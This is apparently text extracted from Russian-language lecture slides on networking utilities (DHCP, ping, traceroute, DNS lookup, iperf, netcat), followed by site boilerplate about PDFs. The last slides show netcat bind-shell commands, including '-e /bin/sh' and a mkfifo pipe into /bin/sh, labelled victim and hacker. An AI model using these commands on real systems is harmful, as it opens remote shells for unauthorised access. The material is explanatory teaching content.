4-5_Utils (1130312)
Текст из файла
Как компьютеры получаютIP адреса?Dynamic Host Configuration Protocol• Протокол уровня приложений• Клиент-серверная архитектура:– DHCP сервер (UDP:67) – хранит и передаётинформацию о сети (в частности, IP адресамашин, адреса шлюзов, адреса DNS-серверов)– DHCP клиент (UDP:68) – получает информациюо сети у DHCP серверовnetstat -pan | grep “\:68 ”Как работает DHCP?• Discovery (Client -> Server)• Src: CLI_ETH | 0.0.0.0• Dst: FF:FF:FF:FF:FF | 255.255.255.0• Offer (Server -> Client)• Src: SRV_ETH | SRV_IP• Dst: CLI_ETH | CLI_IP• Request (Client -> Server)• Src: CLI_ETH | 0.0.0.0• Dst: FF:FF:FF:FF:FF | 255.255.255.0• Acknowledge (Server -> Client)• Src: SRV_ETH | SRV_IP• Dst: CLI_ETH | CLI_IPping• Команда ping использует сообщения– эхо запроса (Echo Request) и– эхо ответа (Echo Reply) протокола ICMP• Используется для диагностики работоспособности сети.• Пример диагностики сети:––––pingpingpingping127.0.0.1 (проверка работы адреса замыкания на себя)<local ip> ( проверка связи с ip адресом локального компьютера)<default gateway> (проверка связи со шлюзом по умолчанию)<remote ip> (проверка связи с удаленным узлом)• Возможные ответы команды ping–––––Получен обычный echo-ответEcho-ответ от запрашиваемого узла не был полученПолучено сообщение о недостижимости узла-получателяПолучено сообщение о невозможности фрагментацииПолучен неизвестный пакетpingЭффект применения опцииLinuxWindowsОпределяет количество отправляемых echoзапросов-c-nНастроить период ожидания в секундах-w-wРазмер ping-пакета-s-lЗапрет на фрагментацию-M do-f…Задача:• Выполнить команду ping для удалённого адреса, используядва пакета содержащих по 3000 байт каждый.• … с запретом на фрагментациюtraceroute / tracert• Использует поле TTL заголовка IP ифункциональность ICMPtraceroute / tracert• Отправляет пробные пакеты с TTL=1,увеличивая значение счетчика на каждойитерации• Сообщения об ошибках ICMPидентифицируют узлы маршрутаtraceroute / tracertЭффект применения опцииLinuxWindowsПроизводить пробы с помощью ICMP echo-I, --icmp=icmpПроизводить пробы с помощью TCP SYN-T, --tcp--Производить пробы с помощью UDP-U, --udp--Начальное значение TTL-f <first_ttl>=1Максимальное значение TTL-m <max_ttl>-hЧисло запросов для каждого хопа-q <nqueries>--Число одновременно посланных запросов-N <squeries>--Время ожидания ответа-w <seconds>-w (ms)Задача:• Определить маршрут передачи пакетов по адресу stanford.edu• Как много маршрутизаторов участвует в передаче данных?• Через какие автономные системы проходит соединение?Как traceroute узнаёт имена машин?Domain Name System (DNS)• Протокол уровня приложений• Поддерживается иерархией DNS-серверов• Хранит дерево доменных имён иассоциированную с ними информацию(например, IP адреса машин (A, AAAA))• Обычно DNS использует UDP:53Утилиты для работы с DNSЗапрость ip адрес для имени <domain-name>у сервера <DNS-server>:nslookup <domain-name> [<DNSserver>]dig [@<DNS-server>] <domain name>Для запроса <domain-name> по заданному ipадресу используется служебный домен arpa:ya.ru (93.158.134.3)dig 3.134.158.93.in-addr.arpadig 8.8.8.8.in-addr.arpaiperfУтилита iperf предназначена для оценкидостижимой пропускной способности e2eсоединения между двумя устройствамиiperfЭффект применения опцииОпцияИспользовать udp вместо tcp-uЗапуститься в режиме сервера (получателя)-sУстановить прослушивание на порту сервера-pЗапуститься в режиме клиента (отправителя)-cКоличество данных, которые нужно передать-n <bytes>Время проведения замеров-t <seconds>Установить интервал вывода результатов-i <seconds>Задача:• Определить пропускную способность стека своей машины• Определить уровень потерь пакетов для сети в классеnetcat (nc)Позволяет устанавливать соединения TCP и UDP ипередавать через них произвольные данныеSlide #12netcat (nc)Эффект применения опцииОпцияПрослушивать локальный порт-l portПередавать данные с IP адреса-s source_ipПередавать данные с порта-p source_portСканирование порта-zВключение подробного вывода-vПодключение по UDP вместо TCP-uЗапустить программу и подключиться к ней*-e filenameЗапустить /bin/sh и подключиться к ней*-c cmd*Опции –e и –с присутствуют только в версии nc-traditionalСтандартная версия nc на современных ОС nc-openbsdПередачафайловОбменсообщениямиИспольозвание ncОтправитель:user@client$ nc server 1234Получатель:user@server$ nc -l 1234Отправитель:user@client$ nc server 3333 < backup.isoПолучатель:user@server$ nc -l 3333 > backup.isoSlide #14Удалённое исполнение команд• Получатель (жертва):• nc-traditional:user@server$ nc –l –p 1234 –e /bin/sh• nc-openbsduser@server$ rm -f /tmp/f; mkfifo /tmp/fuser@server$ cat /tmp/f | /bin/sh -i 2>&1 |nc -l 127.0.0.1 1234 > /tmp/f• Отправитель (хакер):user@client$ nc server 1234Slide #15.
Характеристики
Тип файла PDF
PDF-формат наиболее широко используется для просмотра любого типа файлов на любом устройстве. В него можно сохранить документ, таблицы, презентацию, текст, чертежи, вычисления, графики и всё остальное, что можно показать на экране любого устройства. Именно его лучше всего использовать для печати.
Например, если Вам нужно распечатать чертёж из автокада, Вы сохраните чертёж на флешку, но будет ли автокад в пункте печати? А если будет, то нужная версия с нужными библиотеками? Именно для этого и нужен формат PDF - в нём точно будет показано верно вне зависимости от того, в какой программе создали PDF-файл и есть ли нужная программа для его просмотра.
![](https://s.studizba.com/z.php?f=/templates/si/i/noavatar.png&w=100&h=100&t=1"){kind=avatar}
